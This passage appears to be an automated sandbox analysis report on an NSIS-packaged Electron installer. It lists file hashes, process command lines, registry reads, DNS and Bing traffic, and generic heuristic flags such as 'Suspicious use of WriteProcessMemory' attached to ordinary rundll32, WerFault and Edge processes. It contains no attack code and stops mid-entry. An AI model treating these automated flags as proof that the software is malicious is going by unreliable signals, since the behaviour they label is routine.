| SHA256 | 63963e60a45495ff762f02e02fd42c723d7c482a44c07e50473cbf7ccdd73eca |
| SHA512 | 4163b3eeb5e55beacc53349cad6899e871d74109a50b28a001e98f0000cf6eb57d4e06f10a70557664f15f4456fbcbb80ac7dbd1174bd19a20975da108ef2dc5 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sk.pak
| MD5 | 8e5ecfbf0ab9e00401f088489afed0c2 |
| SHA1 | a99df2ed2a00ade4cde178f73893b84aaee521cc |
| SHA256 | 25e0167d708a004e36e3c344e0209e979d42874122cae03ef2e2c5e110f39364 |
| SHA512 | 401ea003abfb4a32b52cfab912c2199800f54aabf1321802f973a9925f535d40cff9825832d98ca86eb3af794f64aa408dbbd99e2083f2e9fd0d02ec4debd301 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sv.pak
| MD5 | 8132fd35c20f775508f5440b7f3d6871 |
| SHA1 | 4e50c2b45c69e95f95f34398a7a4babc06420c1a |
| SHA256 | 867687296810c4a95a1876edd91ce08e57ff1894c9f22913808fee1d21362589 |
| SHA512 | e13ca94f6766a49a9b11a128bad1a5803c3ae9aaa9a8a536995eaf510da071995fa27b087fd3f14422cf21792a54b9527a1fe658947a446a6764b32a86479d3f |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sr.pak
| MD5 | b1f52cd111da3b1ea1f31e082f15ba25 |
| SHA1 | 3f4f13a0d253e8fbcfc1fb93125feed51f03bc56 |
| SHA256 | 1410f7d93d53642ef9aa8dfd92497c923d71a97e419a6219c7bee7798c3561e1 |
| SHA512 | 2c0ae8d36c496d570d6e013f859caf655a74047a2a27b79ad0895eba5a46c0895d123d532b8bfa4370ce67caf6b874cb29d751fd025586bfafad0bb800b22144 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\ta.pak
| MD5 | 088f7313392bd5bd898a984b434cee97 |
| SHA1 | bda9d5f5e87055674aecdb609a46a046bb0a6903 |
| SHA256 | e2868cbfde36485e8227ec24789a809ef4590f8841e5ee625cee154ba3701e78 |
| SHA512 | f8849d13924da2f5e3bb98f2aae19317d3f4260ec8e916ab88a91d6af97c9ba8fab929f91acb3b5575e30e87dda847f1192b6b2dc1d05341ce75a86a4fee8edb |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\te.pak
| MD5 | d251d089aa789bccc27a0b473d39e46c |
| SHA1 | 283d8fb6b6195b3427144773ffc4691c82e31f0e |
| SHA256 | 8dd7d206379445bd9afa4e01ab986c439cf70841d080fca6e152b453e94fcc49 |
| SHA512 | 27e6f13f6c7937c8121451d70ee90d2a2ce5e519d17e882a86b29a6a78764427022c36b6a99178e9933e01500b55bcbfd0dc79a6f028a046967c2c53f78424fa |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sw.pak
| MD5 | 0787972a076c6690e7938758c2a92e24 |
| SHA1 | dbf02e5a3ae26acb060b533bb006756c19122bfe |
| SHA256 | eb96ab83e2e08e811928742590178e97454863bc581dd8574d6a644fd3c6615a |
| SHA512 | 9f3560a3b648b1a7025cd8a98c39ec7634883aade1ac2c7836fde890cc04bd009aa5c1bca8354ee1259ebcd9482326c51a7d21bdee3caf92984ecbefab35d34c |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\tr.pak
| MD5 | 1e661df0ee32346b7816e1cec439e9da |
| SHA1 | 2bd38e0a4ec62f306aae932d8e448a0911a5a63c |
| SHA256 | 6c5dfdfe34c0f6b2b00364dbd7ef3c62fb0d71a163f9254a7b4b3624d66c4ec0 |
| SHA512 | ef49c1f329f00e2a9350e7a6e3789c6ea2c84026e541717e4d72ea3723ac29e9be3e0d4a82e36ccfab27365feceef0012c209c53e3b079148140e0f08f55de56 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\ur.pak
| MD5 | 7b5fed5150135b728bf8865246f7c8fc |
| SHA1 | 214b0f507ff6384b1b305f1718db43023499eeaa |
| SHA256 | a0c752a805da7dd6608ad04625734f4d27cb75b682f51b2dc8ef08350cc7a2cc |
| SHA512 | 81fc55db4b0635e09057fd060d9eb72bda5a5fd2d2e1e4284e1b45098b287c609526c766b030dd0eaebc0836a32bcbf6dc0aae94327c103f3f736b5cd051a8a1 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\zh-CN.pak
| MD5 | 8af3f2940137687b483ff2f4d9185b98 |
| SHA1 | 58ce1fcadd8ca27abd11f0614401a12a7e93b11e |
| SHA256 | 766f8ac9d4e06437fd3300608ad4d31228576dcaa1e164ccbc4333d56493e9fe |
| SHA512 | fe55fb3d0abab843e4ea1a33d590b3a9e885f6ea8a38cb8f651d090e8c5ea3400efd212502cac500ef26cc5d6b7a4a7cb66e4aee1a4bb13b97f0926ac99b16e0 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\vi.pak
| MD5 | b6174a2dd1e3f557cb99060fc3101063 |
| SHA1 | be115f1d2dc8135683a182ab5c09feab74a3c97f |
| SHA256 | b654478c2d28b97d821a75543a0494bc35548749fc3eeb6b33b08b4f5f4fd84c |
| SHA512 | ddbd38e7513f213b3603b1fbf16ad21fa34382cd11e33201cf579c2913a7b6e143a03bf12f11afb281a40c6948da9844b6c9d5ab372d7500184014e98ea74c19 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\zh-TW.pak
| MD5 | ca8bf0d267507545580758c81e9fb2c2 |
| SHA1 | 9ec7a2e731775bf3224317681847ffc54376702d |
| SHA256 | eb02d499aada4f358c0776c301416de758167ada695503c0e72135ee462fcdfc |
| SHA512 | d5322739253544d519d52aaf8a34fd0fcf3abcc49499e60d320265e85b173f49189d0f95c7ff67a9369400759830141bc342de7fb710cd047e8832070007716f |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\uk.pak
| MD5 | b11fcf5670f611e270552a51e8f4000a |
| SHA1 | c28630a621b77df7434fb016f5b1e50d456cf296 |
| SHA256 | 96f45509b52f046e70f3f61416b93ba8f2f5a0f06d7d849056161300a3ac6e5c |
| SHA512 | a6f357825e59c35f72d740ca23300b3e233be1949dc4c5c5a3a268f4e0194b0be839f95fc125d8527d851971952c09ac233b294002f43911c2599859d935e8c7 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\resources\app.asar
| MD5 | e17391bf3cc98be5554b509c39908fb9 |
| SHA1 | 8f2e6726c940ce42df95a05c78385c824b4d560a |
| SHA256 | 7fbeab871461f743124788a03f048c21991e6f8cd165cf7af5ed87bf11126e3a |
| SHA512 | 998750ec0971f5aa7102253b38eb786dc3ba1f5ef9870a34ba7e4366cef37c04c15dca75467b17cfdb0b8c6950f042615ada8f6689d8cf8453460456133e67aa |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\th.pak
| MD5 | 33dae3c79e7c1798eada31b70e3f2518 |
| SHA1 | c386f4babd6545c915dda9dfd4bcc8cae5ff6c86 |
| SHA256 | a88de31d7605a1c3eed2b5008cbf31de368d91fd57a543c995a3c2263144054a |
| SHA512 | a1d033f85ba340a8f6f3da1aaa15bb8b04abc1acca1e9554af04576f512d38e6088c406f3227e03239e741eab68fe3a83a0ee13aff3c51554fa7e41b1d42029d |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
136s
Max time network
107s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2664 wrote to memory of 4884 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2664 wrote to memory of 4884 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2664 wrote to memory of 4884 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4884 -ip 4884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7fffba6b46f8,0x7fffba6b4708,0x7fffba6b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3044 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 439b5e04ca18c7fb02cf406e6eb24167 |
| SHA1 | e0c5bb6216903934726e3570b7d63295b9d28987 |
| SHA256 | 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654 |
| SHA512 | d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2 |
\??\pipe\LOCAL\crashpad_816_YTNXWRNVAHFSEDRA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a8e767fd33edd97d306efb6905f93252 |
| SHA1 | a6f80ace2b57599f64b0ae3c7381f34e9456f9d3 |
| SHA256 | c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb |
| SHA512 | 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 24f5eae92162bed7b593cd7af688cee2 |
| SHA1 | 8506b0c1644d51bc69bf3beca3a9e7d81ffc0b6c |
| SHA256 | dd166b4db1ab1554ebc560009d823e0eab8992237d00f2d049395484603c94d9 |
| SHA512 | 2bbb9b7cf873c85946b2914705909fc31f35eb6e86ee47d5b367d54af16288f9c568a8fb2d92b7c3ba1adff27d4698bea41241bedeba569de8e6b45848026ba1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2d9319626454f899e7de2610055df7e2 |
| SHA1 | 5bc6f66471d538be58394b05bca38f275b9d614b |
| SHA256 | 58bb01a0681a7897bef3591f45fa230c7605c91e3c0ac31a9b075d3540951b1a |
| SHA512 | eafedfbcd9011d809611af46ae261a7e190ec0f6259b67b9135602359014a5d1cfcd3e572b065fb3918c9ee492cfb6367358bf0f54103c874e88effad3fd98d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | df6102fcece050c6c17f935b2e2e9778 |
| SHA1 | 612726ea14088002a2cb10a1c278bc8040998628 |
| SHA256 | acde55455211444a448252b2c36fc3f56bfec1f0ad8e193a51aa5a92cbf97164 |
| SHA512 | a4f0032098b3c7822ef6e133290a10c96e640ebb6afabd6dcc1ed8e3a3344b25aa8dd52c67aedc8d635a04a0e6e056bf05cd8856b9c520dddc64c3908a507da1 |
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240426-en
Max time kernel
93s
Max time network
154s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 116 wrote to memory of 4540 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 116 wrote to memory of 4540 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 116 wrote to memory of 4540 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4540 -ip 4540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win7-20240220-en
Max time kernel
122s
Max time network
125s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 220
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win7-20240419-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Windows\system32\rundll32.exe
